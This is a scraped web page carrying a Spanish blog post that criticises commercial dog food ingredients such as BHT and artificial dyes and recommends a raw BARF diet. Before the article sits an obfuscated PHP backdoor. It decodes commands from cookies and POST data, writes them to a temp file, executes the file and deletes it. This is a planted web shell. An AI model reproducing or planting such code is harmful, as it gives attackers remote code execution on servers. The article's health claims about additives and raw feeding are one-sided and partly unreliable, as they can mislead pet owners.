$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> ALIMENTOS PARA MASCOTAS: UNA CRUEL REALIDAD – www.interferencechannel.com

ALIMENTOS PARA MASCOTAS: UNA CRUEL REALIDAD

Muchos compartimos un ser hermoso en casa que nos cuida y nos ama: y no, no es nuestra madre (jajaja) son nuestras muy queridas y lindas mascotas a las que queremos y al igual que a los hijos tratamos de dar todos los cuidados necesarios.

Bueno, hace unos días lleve a mi mascota a un control médico y descubrieron que tenía un tumor que aunque no se confirmo era posible que fuese cáncer, bien empecé a pensar (ya era hora jejeje) y me pregunte ¿tienen los ancestros de los perros, los lobos este tipo de padecimientos?, si no es así ¿a qué se debe?, en fin…alguna vez escuche que a ciertos enfermos de leucemia se les cambia la alimentación por alimentos orgánicos y por tanto decidí investigar el contenido de la alimentación que por 7 años le he administrado a mi perro: El Concentrado de marca Ladrina de Purina:

  • Maíz y/o sorgo y/o arroz
  • Harina de gluten de maíz
  • Harina de subproductos de trigo y/o fibra de soya
  • Harina de soya
  • Harina de carne y hueso
  • Harina de subproductos de subproductos de pollo
  • Grasa animal y/o vegetal estabilizada con BHT
  • Digesto animal,sal, suero de leche y/o leche en polvo
  • Zanahoria deshidratada
  • Espinaca deshidratada
  • Colores artificiales: rojo N°40, amarillos N°5, azúl N°2
  • Dióxido de titanio
  • Vitaminas (A, D-3,E,B1,B2,B6,B12)
  • Panteonato de calcio
  • Ácido fólico,niacina,cloruro de colina,L-lisina,Carbonato de calcio,fosfato de calcio,cloruro de potasio,sulfato de zinc, sulfato ferroso,sulfato de cobre, sulfato de magnesio, ioduro de calcio, selenito de sodio
  • Y ároma a carne a la parrilla

 Cuando leí esto me pareció bien no? Que tiene de malo el maíz, el sorgo o el arroz, nada; sin embargo encontré ciertas cosas que no sabía qué eran: la primera es el BHT (Butilhidroxitolueno) un antioxidante proveniente de la industria petrolera que se usa junto con el BHA (Butilhidroxianisol) como aditivo es decir sustancias que alargan la vida de los productos y que en ocasiones mejoran su aspecto, estos dos productos se usan también en repostería humana y está comprobado efectos carcinógenos en animales de experimentación en los que se desarrollan tumoraciones.

Después me di cuenta que el concentrado presenta tres tipos de colorantes: rojo N°40, amarillos N°5, azul N°2 cuando busque qué son dichos colorantes encontré lo siguiente: el rojo 40 también se conoce como Rojo Alluray se usa en gomitas y en la industria cárnica en algunos países de Europa se ha prohibido su comercialización porque puede causar daño en el ADN y cáncer de vejiga; el amarillo N°5 es Tartrazinaen niños causa déficit de atención, muchos países lo han prohibido y también tiene índices de  cáncer, afectaciones en personas asmáticas y  generación de lesiones de la piel (urticaria, purpuras y anafilaxia)durante años mi perro ha tenido problemas de piel ahora me pregunto si esta era la causa…

 Por lo demás, los perros y gatos son carnívoros es decir pertenecen el orden Carnivora lo que significa que se alimentan de carne, y  para el caso de los alimentos empacados los primeros componentes son los que vienen en mayor cantidad lo que equivaldría en este caso a: maíz, sorgo y arroz; lo cual puede generar desordenes entre otras cosas porque: pasan demasiado tiempo en el intestino de los animales, las altas temperaturas en que se fabrican  destruyen diversos nutrientes, el alto contenido de granos es inapropiado para perros y gatos y los alimentos secos se pegan a los dientes y hacen proliferar bacterias proliferando dolor y envenenamiento bacteriano.

LA SOLUCIÓN: DIETA BARF

El doctor veterinario IanBillinghurst propuso esta dieta cuyo objetivo es aumentar la salud y longevidad de los animales y disminuir por tanto la atención veterinaria, ¿cómo alimentar a tú mascota? Dándole la dieta para la que ellos evolucionaron y están diseñados para comer, es decir carnes, huesos y demás alimentos crudos: la dieta BARF se compone de: 50% carne y entre 20-40% de frutas y vegetales crudos, huevos y vísceras.

Bueno yo hace dos semanas le he venido alimentando a mi perro con esto y he tenido buenos resultados, se evidencia más saludable, enérgico y evidentemente adora su nueva comida, espero que esta información les sea útil… Dejo unos links sobre alimentación BARF.♦

*Juana Suárez

Interference Channel

http://www.youtube.com/watch?v=p3yq5xjRtYk

http://www.youtube.com/watch?v=mpxXrn7ahlU

Comments are closed.